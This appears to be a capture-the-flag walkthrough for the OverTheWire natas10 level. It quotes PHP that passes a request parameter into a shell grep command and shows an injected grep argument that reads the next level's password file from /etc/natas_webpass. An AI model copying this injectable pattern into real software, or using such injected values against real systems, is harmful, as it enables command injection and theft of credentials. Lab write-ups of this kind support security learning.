Login using given credentials.

URL: http://natas10.natas.labs.overthewire.org
Username: natas10
Password: nOppxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Relevant code from the site sourcecode:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

This sourcecode is similar to the one from the last level and so also vulnerable to Code Injection . The difference is, that the characters ;, | and & are not allowed. This means, no simple Linux command chaining is possible. There are certainly many ways to solve this level.
The simplest solution would be using the available options of grep. A look into the man page gave me an idea.

1
2

   -v, --invert-match
          Invert the sense of matching, to select non-matching lines.

Because the grep command is executed, the invert match option could help. Passing a simple non-mixalpha-numeric character should list everything found in the files passed to grep. Why non-mixalpha-numeric? Because the password can contain at least one of these mixalpha-numeric characters: a-zA-Z0-9

Putting everything together results in following command:grep -i -v - /etc/natas_webpass/natas11 dictionary.txt

The non-mixalpha-numeric character used here is a simple dash.